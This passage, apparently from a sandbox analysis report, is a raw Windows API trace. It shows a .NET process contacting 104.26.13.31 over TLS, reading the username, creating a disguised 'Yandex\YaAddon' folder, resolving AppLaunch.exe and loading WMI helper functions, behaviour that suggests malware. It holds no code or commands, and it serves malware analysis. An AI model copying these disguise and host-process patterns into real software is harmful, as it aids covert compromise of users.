[50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x12c89f1d, FirstDnsSuffix=0x0), SizePointer=0x38edfc*=0x7ec) returned 0x0 [0188.375] LocalFree (hMem=0x753040) returned 0x0 [0188.375] WSAConnect (in: s=0x34c, name=0x2644244*(sa_family=2, sin_port=0x1bb, sin_addr="104.26.13.31"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0189.474] closesocket (s=0x348) returned 0 [0189.578] EnumerateSecurityPackagesW (in: pcPackages=0x38ed6c, ppPackageInfo=0x38ed00 | out: pcPackages=0x38ed6c, ppPackageInfo=0x38ed00) returned 0x0 [0189.582] FreeContextBuffer (in: pvContextBuffer=0x753040 | out: pvContextBuffer=0x753040) returned 0x0 [0189.588] GetCurrentProcess () returned 0xffffffff [0189.588] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38eb28 | out: TokenHandle=0x38eb28*=0x348) returned 1 [0189.590] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2645354, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x38eb7c, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x26469e4, ptsExpiry=0x38eb00 | out: phCredential=0x26469e4, ptsExpiry=0x38eb00) returned 0x0 [0190.496] CloseHandle (hObject=0x348) returned 1 [0190.498] InitializeSecurityContextW (in: phCredential=0x38eb4c, phContext=0x0, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2646b80, pfContextAttr=0x2645318, ptsExpiry=0x38eb44 | out: phNewContext=0x2646be8, pOutput=0x2646b80, pfContextAttr=0x2645318, ptsExpiry=0x38eb44) returned 0x90312 [0190.499] FreeContextBuffer (in: pvContextBuffer=0x6d9ac0 | out: pvContextBuffer=0x6d9ac0) returned 0x0 [0190.501] send (s=0x34c, buf=0x2646bfc*, len=113, flags=0) returned 113 [0190.502] recv (in: s=0x34c, buf=0x2646bfc, len=5, flags=0 | out: buf=0x2646bfc*) returned 5 [0190.548] recv (in: s=0x34c, buf=0x2646c01, len=91, flags=0 | out: buf=0x2646c01*) returned 91 [0190.549] InitializeSecurityContextW (in: phCredential=0x38eaa8, phContext=0x38ea98, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2646dfc, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2646e10, pfContextAttr=0x2645318, ptsExpiry=0x38eaa0 | out: phNewContext=0x2646be8, pOutput=0x2646e10, pfContextAttr=0x2645318, ptsExpiry=0x38eaa0) returned 0x90312 [0190.550] recv (in: s=0x34c, buf=0x2646ea0, len=5, flags=0 | out: buf=0x2646ea0*) returned 5 [0190.550] recv (in: s=0x34c, buf=0x2646eb9, len=2908, flags=0 | out: buf=0x2646eb9*) returned 2908 [0190.550] InitializeSecurityContextW (in: phCredential=0x38ea08, phContext=0x38e9f8, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2647a88, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2647a9c, pfContextAttr=0x2645318, ptsExpiry=0x38ea00 | out: phNewContext=0x2646be8, pOutput=0x2647a9c, pfContextAttr=0x2645318, ptsExpiry=0x38ea00) returned 0x90312 [0190.552] recv (in: s=0x34c, buf=0x2647b2c, len=5, flags=0 | out: buf=0x2647b2c*) returned 5 [0190.552] recv (in: s=0x34c, buf=0x2647b45, len=331, flags=0 | out: buf=0x2647b45*) returned 331 [0190.552] InitializeSecurityContextW (in: phCredential=0x38e968, phContext=0x38e958, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2647d00, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2647d14, pfContextAttr=0x2645318, ptsExpiry=0x38e960 | out: phNewContext=0x2646be8, pOutput=0x2647d14, pfContextAttr=0x2645318, ptsExpiry=0x38e960) returned 0x90312 [0190.552] recv (in: s=0x34c, buf=0x2647da4, len=5, flags=0 | out: buf=0x2647da4*) returned 5 [0190.552] recv (in: s=0x34c, buf=0x2647dbd, len=4, flags=0 | out: buf=0x2647dbd*) returned 4 [0190.553] InitializeSecurityContextW (in: phCredential=0x38e8c8, phContext=0x38e8b8, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2647e34, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2647e48, pfContextAttr=0x2645318, ptsExpiry=0x38e8c0 | out: phNewContext=0x2646be8, pOutput=0x2647e48, pfContextAttr=0x2645318, ptsExpiry=0x38e8c0) returned 0x90312 [0190.575] FreeContextBuffer (in: pvContextBuffer=0x72e540 | out: pvContextBuffer=0x72e540) returned 0x0 [0190.575] send (s=0x34c, buf=0x2647ec4*, len=134, flags=0) returned 134 [0190.575] recv (in: s=0x34c, buf=0x2647ec4, len=5, flags=0 | out: buf=0x2647ec4*) returned 5 [0190.610] recv (in: s=0x34c, buf=0x2647ec9, len=1, flags=0 | out: buf=0x2647ec9*) returned 1 [0190.611] InitializeSecurityContextW (in: phCredential=0x38e828, phContext=0x38e818, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2647fd0, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2647ff0, pfContextAttr=0x2645318, ptsExpiry=0x38e820 | out: phNewContext=0x2646be8, pOutput=0x2647ff0, pfContextAttr=0x2645318, ptsExpiry=0x38e820) returned 0x90312 [0190.611] recv (in: s=0x34c, buf=0x2648080, len=5, flags=0 | out: buf=0x2648080*) returned 5 [0190.611] recv (in: s=0x34c, buf=0x2648099, len=48, flags=0 | out: buf=0x2648099*) returned 48 [0190.612] InitializeSecurityContextW (in: phCredential=0x38e788, phContext=0x38e778, pTargetName=0x2644310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x264813c, Reserved2=0x0, phNewContext=0x2646be8, pOutput=0x2648150, pfContextAttr=0x2645318, ptsExpiry=0x38e780 | out: phNewContext=0x2646be8, pOutput=0x2648150, pfContextAttr=0x2645318, ptsExpiry=0x38e780) returned 0x0 [0191.034] QueryContextAttributesW (in: phContext=0x2646be8, ulAttribute=0x4, pBuffer=0x26481fc | out: pBuffer=0x26481fc) returned 0x0 [0191.035] QueryContextAttributesW (in: phContext=0x2646be8, ulAttribute=0x5a, pBuffer=0x2648254 | out: pBuffer=0x2648254) returned 0x0 [0191.041] QueryContextAttributesW (in: phContext=0x2646be8, ulAttribute=0x53, pBuffer=0x2648300 | out: pBuffer=0x2648300) returned 0x0 [0191.049] CertDuplicateCRLContext (pCrlContext=0x753ad8) returned 0x753ad8 [0191.051] CertDuplicateStore (hCertStore=0x711110) returned 0x711110 [0191.051] CertEnumCertificatesInStore (hCertStore=0x711110, pPrevCertContext=0x0) returned 0x753b28 [0191.052] CertDuplicateCRLContext (pCrlContext=0x753b28) returned 0x753b28 [0191.052] CertEnumCertificatesInStore (hCertStore=0x711110, pPrevCertContext=0x753b28) returned 0x753ad8 [0191.053] CertDuplicateCRLContext (pCrlContext=0x753ad8) returned 0x753ad8 [0191.053] CertEnumCertificatesInStore (hCertStore=0x711110, pPrevCertContext=0x753ad8) returned 0x0 [0191.053] CertCloseStore (hCertStore=0x711110, dwFlags=0x0) returned 1 [0191.053] CertFreeCRLContext (pCrlContext=0x753ad8) returned 1 [0191.066] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x711188 [0191.069] CertAddCRLLinkToStore (in: hCertStore=0x711188, pCrlContext=0x753b28, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0191.069] CertAddCRLLinkToStore (in: hCertStore=0x711188, pCrlContext=0x753ad8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0191.071] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6f6fb8 [0191.073] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x753ad8, pTime=0x38e794, hAdditionalStore=0x711188, pChainPara=0x38e6d4, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x38e6c8 | out: ppChainContext=0x38e6c8) returned 1 [0192.152] LocalFree (hMem=0x6f6fb8) returned 0x0 [0192.153] CertDuplicateCertificateChain (pChainContext=0x539d378) returned 0x539d378 [0192.156] CertDuplicateCRLContext (pCrlContext=0x753ad8) returned 0x753ad8 [0192.157] CertDuplicateCRLContext (pCrlContext=0x55aa230) returned 0x55aa230 [0192.157] CertDuplicateCRLContext (pCrlContext=0x55aa280) returned 0x55aa280 [0192.157] CertFreeCertificateChain (pChainContext=0x539d378) [0192.158] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x539d378, pPolicyPara=0x38e874, pPolicyStatus=0x38e860 | out: pPolicyStatus=0x38e860) returned 1 [0192.159] SetLastError (dwErrCode=0x0) [0192.162] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x539d378, pPolicyPara=0x38e8d4, pPolicyStatus=0x38e888 | out: pPolicyStatus=0x38e888) returned 1 [0192.165] CertFreeCertificateChain (pChainContext=0x539d378) [0192.165] CertFreeCRLContext (pCrlContext=0x753ad8) returned 1 [0192.170] CoTaskMemAlloc (cb=0x20c) returned 0x546fd40 [0192.170] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x546fd40, nSize=0x104 | out: lpBuffer="") returned 0x0 [0192.170] CoTaskMemFree (pv=0x546fd40) [0192.170] CoTaskMemAlloc (cb=0x210) returned 0x546fd40 [0192.170] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x546fd40, nSize=0x106 | out: lpBuffer="") returned 0x0 [0192.170] CoTaskMemFree (pv=0x546fd40) [0192.170] CoTaskMemAlloc (cb=0x210) returned 0x546fd40 [0192.170] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x546fd40, nSize=0x106 | out: lpBuffer="") returned 0x0 [0192.170] CoTaskMemFree (pv=0x546fd40) [0192.170] CoTaskMemAlloc (cb=0x210) returned 0x546fd40 [0192.170] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x546fd40, nSize=0x106 | out: lpBuffer="") returned 0x0 [0192.171] CoTaskMemFree (pv=0x546fd40) [0192.172] EncryptMessage (in: phContext=0x2646be8, fQOP=0x0, pMessage=0x2650878, MessageSeqNo=0x0 | out: pMessage=0x2650878) returned 0x0 [0192.174] send (s=0x34c, buf=0x264f350*, len=138, flags=0) returned 138 [0192.178] setsockopt (s=0x34c, level=65535, optname=4102, optval="\x98:", optlen=4) returned 0 [0192.182] recv (in: s=0x34c, buf=0x265cb8c, len=5, flags=0 | out: buf=0x265cb8c*) returned 5 [0192.577] recv (in: s=0x34c, buf=0x265cb91, len=896, flags=0 | out: buf=0x265cb91*) returned 896 [0192.578] DecryptMessage (in: phContext=0x2646be8, pMessage=0x2660c4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2660c4c, pfQOP=0x0) returned 0x0 [0192.604] setsockopt (s=0x34c, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0192.609] recv (in: s=0x34c, buf=0x265cb8c, len=5, flags=0 | out: buf=0x265cb8c*) returned 5 [0192.609] recv (in: s=0x34c, buf=0x265cb91, len=32, flags=0 | out: buf=0x265cb91*) returned 32 [0192.609] DecryptMessage (in: phContext=0x2646be8, pMessage=0x26644c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26644c4, pfQOP=0x0) returned 0x0 [0192.610] SetEvent (hEvent=0x270) returned 1 [0192.631] CoTaskMemAlloc (cb=0x20c) returned 0x55e3d28 [0192.631] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x55e3d28 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0192.633] CoTaskMemFree (pv=0x55e3d28) [0192.633] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0192.633] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x38ec08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0192.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee44) returned 1 [0192.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x38f108 | out: lpFileInformation=0x38f108*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee40) returned 1 [0192.633] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x38ec0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0192.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38edd4) returned 1 [0192.634] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x38f098 | out: lpFileInformation=0x38f098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edd0) returned 1 [0192.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38edd4) returned 1 [0192.634] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x38f098 | out: lpFileInformation=0x38f098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edd0) returned 1 [0192.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38edd4) returned 1 [0192.634] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex"), fInfoLevelId=0x0, lpFileInformation=0x38f098 | out: lpFileInformation=0x38f098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edd0) returned 1 [0192.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38edd4) returned 1 [0192.634] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x38f098 | out: lpFileInformation=0x38f098*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0192.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38edd0) returned 1 [0192.635] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex"), lpSecurityAttributes=0x0) returned 1 [0192.637] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), lpSecurityAttributes=0x0) returned 1 [0192.807] GetUserNameW (in: lpBuffer=0x38ef18, pcbBuffer=0x38f190 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x38f190) returned 1 [0192.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0192.819] CoTaskMemAlloc (cb=0x804) returned 0x55e4d68 [0192.819] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55e4d68, nSize=0x38f180 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x38f180) returned 0x1 [0192.820] CoTaskMemFree (pv=0x55e4d68) [0192.820] GetUserNameW (in: lpBuffer=0x38ef10, pcbBuffer=0x38f188 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x38f188) returned 1 [0193.032] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x530 [0193.034] CoGetObjectContext (in: riid=0x2667f40*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9d0 | out: ppv=0x38e9d0*=0x6d0cac) returned 0x0 [0193.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x38dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0193.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x38e148, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0193.259] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6d5f0000 [0193.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x38e17c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecuritymnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 13 [0193.412] GetProcAddress (hModule=0x6d5f0000, lpProcName="ResetSecurity") returned 0x6d5f7dd0 [0193.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x38e17c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0193.423] GetProcAddress (hModule=0x6d5f0000, lpProcName="SetSecurity") returned 0x6d5f7e20 [0193.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x38e178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 18 [0193.433] GetProcAddress (hModule=0x6d5f0000, lpProcName="BlessIWbemServices") returned 0x6d5f6e70 [0193.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x38e170, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 24 [0193.461] GetProcAddress (hModule=0x6d5f0000, lpProcName="BlessIWbemServicesObject") returned 0x6d5f6ed0 [0193.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x38e178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandlemnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 17 [0193.490] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetPropertyHandle") returned 0x6d5f7820 [0193.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x38e178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValuenmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 18 [0193.568] GetProcAddress (hModule=0x6d5f0000, lpProcName="WritePropertyValue") returned 0x6d5f7fa0 [0193.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x38e184, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClonemnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 5 [0193.585] GetProcAddress (hModule=0x6d5f0000, lpProcName="Clone") returned 0x6d5f6f30 [0193.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x38e178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0193.598] GetProcAddress (hModule=0x6d5f0000, lpProcName="VerifyClientKey") returned 0x6d5f7f20 [0193.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x38e178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0193.604] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetQualifierSet") returned 0x6d5f78e0 [0193.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x38e184, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0193.606] GetProcAddress (hModule=0x6d5f0000, lpProcName="Get") returned 0x6d5f75c0 [0193.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x38e184, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0193.670] GetProcAddress (hModule=0x6d5f0000, lpProcName="Put") returned 0x6d5f7a00 [0193.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x38e184, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeletenmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 6 [0193.692] GetProcAddress (hModule=0x6d5f0000, lpProcName="Delete") returned 0x6d5f7300 [0193.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x38e180, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 8 [0193.705] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetNames") returned 0x6d5f77c0 [0193.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x38e178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumeration»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 16 [0193.727] GetProcAddress (hModule=0x6d5f0000, lpProcName="BeginEnumeration") returned 0x6d5f6e30 [0193.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x38e184, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next»mnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 4 [0193.784] GetProcAddress (hModule=0x6d5f0000, lpProcName="Next") returned 0x6d5f79a0 [0193.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x38e17c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumerationnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 14 [0193.800] GetProcAddress (hModule=0x6d5f0000, lpProcName="EndEnumeration") returned 0x6d5f73c0 [0193.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x38e170, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0193.808] GetProcAddress (hModule=0x6d5f0000, lpProcName="GetPropertyQualifierSet") returned 0x6d5f78b0 [0193.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x38e184, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClonemnmÔ\x96:lDþNrXä8", lpUsedDefaultChar=0x0) returned 5 [0193.820] GetProcAddress (hModule=0x6d5f0000, lpProcName="Clone") returned 0x6d5f6f30 [0193.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 